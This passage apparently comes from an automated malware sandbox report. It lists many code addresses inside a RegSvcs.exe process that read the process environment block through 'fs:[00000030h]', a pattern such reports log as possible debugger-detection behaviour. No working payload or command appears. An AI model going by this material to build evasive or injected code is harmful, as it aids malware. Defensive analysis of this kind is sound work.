                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01724144 mov eax, dword ptr fs:[00000030h]10_2_01724144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01724144 mov ecx, dword ptr fs:[00000030h]10_2_01724144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01724144 mov eax, dword ptr fs:[00000030h]10_2_01724144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01724144 mov eax, dword ptr fs:[00000030h]10_2_01724144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696154 mov eax, dword ptr fs:[00000030h]10_2_01696154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696154 mov eax, dword ptr fs:[00000030h]10_2_01696154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C156 mov eax, dword ptr fs:[00000030h]10_2_0168C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C0124 mov eax, dword ptr fs:[00000030h]10_2_016C0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01750115 mov eax, dword ptr fs:[00000030h]10_2_01750115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173A118 mov ecx, dword ptr fs:[00000030h]10_2_0173A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173A118 mov eax, dword ptr fs:[00000030h]10_2_0173A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173A118 mov eax, dword ptr fs:[00000030h]10_2_0173A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173A118 mov eax, dword ptr fs:[00000030h]10_2_0173A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov ecx, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov ecx, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov ecx, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov eax, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E10E mov ecx, dword ptr fs:[00000030h]10_2_0173E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017661E5 mov eax, dword ptr fs:[00000030h]10_2_017661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C01F8 mov eax, dword ptr fs:[00000030h]10_2_016C01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E1D0 mov eax, dword ptr fs:[00000030h]10_2_0170E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E1D0 mov eax, dword ptr fs:[00000030h]10_2_0170E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E1D0 mov ecx, dword ptr fs:[00000030h]10_2_0170E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E1D0 mov eax, dword ptr fs:[00000030h]10_2_0170E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0170E1D0 mov eax, dword ptr fs:[00000030h]10_2_0170E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017561C3 mov eax, dword ptr fs:[00000030h]10_2_017561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017561C3 mov eax, dword ptr fs:[00000030h]10_2_017561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D0185 mov eax, dword ptr fs:[00000030h]10_2_016D0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171019F mov eax, dword ptr fs:[00000030h]10_2_0171019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171019F mov eax, dword ptr fs:[00000030h]10_2_0171019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171019F mov eax, dword ptr fs:[00000030h]10_2_0171019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171019F mov eax, dword ptr fs:[00000030h]10_2_0171019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01734180 mov eax, dword ptr fs:[00000030h]10_2_01734180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01734180 mov eax, dword ptr fs:[00000030h]10_2_01734180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174C188 mov eax, dword ptr fs:[00000030h]10_2_0174C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174C188 mov eax, dword ptr fs:[00000030h]10_2_0174C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A197 mov eax, dword ptr fs:[00000030h]10_2_0168A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A197 mov eax, dword ptr fs:[00000030h]10_2_0168A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A197 mov eax, dword ptr fs:[00000030h]10_2_0168A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016BC073 mov eax, dword ptr fs:[00000030h]10_2_016BC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01716050 mov eax, dword ptr fs:[00000030h]10_2_01716050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01692050 mov eax, dword ptr fs:[00000030h]10_2_01692050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01726030 mov eax, dword ptr fs:[00000030h]10_2_01726030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A020 mov eax, dword ptr fs:[00000030h]10_2_0168A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C020 mov eax, dword ptr fs:[00000030h]10_2_0168C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01714000 mov ecx, dword ptr fs:[00000030h]10_2_01714000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01732000 mov eax, dword ptr fs:[00000030h]10_2_01732000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE016 mov eax, dword ptr fs:[00000030h]10_2_016AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE016 mov eax, dword ptr fs:[00000030h]10_2_016AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE016 mov eax, dword ptr fs:[00000030h]10_2_016AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE016 mov eax, dword ptr fs:[00000030h]10_2_016AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016980E9 mov eax, dword ptr fs:[00000030h]10_2_016980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A0E3 mov ecx, dword ptr fs:[00000030h]10_2_0168A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017160E0 mov eax, dword ptr fs:[00000030h]10_2_017160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C0F0 mov eax, dword ptr fs:[00000030h]10_2_0168C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016D20F0 mov ecx, dword ptr fs:[00000030h]10_2_016D20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017120DE mov eax, dword ptr fs:[00000030h]10_2_017120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016880A0 mov eax, dword ptr fs:[00000030h]10_2_016880A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017560B8 mov eax, dword ptr fs:[00000030h]10_2_017560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017560B8 mov ecx, dword ptr fs:[00000030h]10_2_017560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017280A8 mov eax, dword ptr fs:[00000030h]10_2_017280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169208A mov eax, dword ptr fs:[00000030h]10_2_0169208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173437C mov eax, dword ptr fs:[00000030h]10_2_0173437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01738350 mov ecx, dword ptr fs:[00000030h]10_2_01738350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0175A352 mov eax, dword ptr fs:[00000030h]10_2_0175A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171035C mov eax, dword ptr fs:[00000030h]10_2_0171035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171035C mov eax, dword ptr fs:[00000030h]10_2_0171035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171035C mov eax, dword ptr fs:[00000030h]10_2_0171035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171035C mov ecx, dword ptr fs:[00000030h]10_2_0171035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171035C mov eax, dword ptr fs:[00000030h]10_2_0171035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0171035C mov eax, dword ptr fs:[00000030h]10_2_0171035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01712349 mov eax, dword ptr fs:[00000030h]10_2_01712349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176634F mov eax, dword ptr fs:[00000030h]10_2_0176634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov eax, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov ecx, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov eax, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01768324 mov eax, dword ptr fs:[00000030h]10_2_01768324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA30B mov eax, dword ptr fs:[00000030h]10_2_016CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA30B mov eax, dword ptr fs:[00000030h]10_2_016CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016CA30B mov eax, dword ptr fs:[00000030h]10_2_016CA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168C310 mov ecx, dword ptr fs:[00000030h]10_2_0168C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B0310 mov ecx, dword ptr fs:[00000030h]10_2_016B0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A03E9 mov eax, dword ptr fs:[00000030h]10_2_016A03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016C63FF mov eax, dword ptr fs:[00000030h]10_2_016C63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F0 mov eax, dword ptr fs:[00000030h]10_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F0 mov eax, dword ptr fs:[00000030h]10_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016AE3F0 mov eax, dword ptr fs:[00000030h]10_2_016AE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017343D4 mov eax, dword ptr fs:[00000030h]10_2_017343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017343D4 mov eax, dword ptr fs:[00000030h]10_2_017343D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov eax, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov eax, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov ecx, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0173E3DB mov eax, dword ptr fs:[00000030h]10_2_0173E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A3C0 mov eax, dword ptr fs:[00000030h]10_2_0169A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016983C0 mov eax, dword ptr fs:[00000030h]10_2_016983C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017163C0 mov eax, dword ptr fs:[00000030h]10_2_017163C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174C3CD mov eax, dword ptr fs:[00000030h]10_2_0174C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E388 mov eax, dword ptr fs:[00000030h]10_2_0168E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E388 mov eax, dword ptr fs:[00000030h]10_2_0168E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168E388 mov eax, dword ptr fs:[00000030h]10_2_0168E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B438F mov eax, dword ptr fs:[00000030h]10_2_016B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016B438F mov eax, dword ptr fs:[00000030h]10_2_016B438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688397 mov eax, dword ptr fs:[00000030h]10_2_01688397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688397 mov eax, dword ptr fs:[00000030h]10_2_01688397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01688397 mov eax, dword ptr fs:[00000030h]10_2_01688397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01740274 mov eax, dword ptr fs:[00000030h]10_2_01740274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168826B mov eax, dword ptr fs:[00000030h]10_2_0168826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694260 mov eax, dword ptr fs:[00000030h]10_2_01694260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694260 mov eax, dword ptr fs:[00000030h]10_2_01694260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01694260 mov eax, dword ptr fs:[00000030h]10_2_01694260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A250 mov eax, dword ptr fs:[00000030h]10_2_0174A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0174A250 mov eax, dword ptr fs:[00000030h]10_2_0174A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0176625D mov eax, dword ptr fs:[00000030h]10_2_0176625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01696259 mov eax, dword ptr fs:[00000030h]10_2_01696259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01718243 mov eax, dword ptr fs:[00000030h]10_2_01718243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01718243 mov ecx, dword ptr fs:[00000030h]10_2_01718243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168A250 mov eax, dword ptr fs:[00000030h]10_2_0168A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0168823B mov eax, dword ptr fs:[00000030h]10_2_0168823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02E1 mov eax, dword ptr fs:[00000030h]10_2_016A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02E1 mov eax, dword ptr fs:[00000030h]10_2_016A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02E1 mov eax, dword ptr fs:[00000030h]10_2_016A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_017662D6 mov eax, dword ptr fs:[00000030h]10_2_017662D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0169A2C3 mov eax, dword ptr fs:[00000030h]10_2_0169A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016A02A0 mov eax, dword ptr fs:[00000030h]10_2_016A02A0
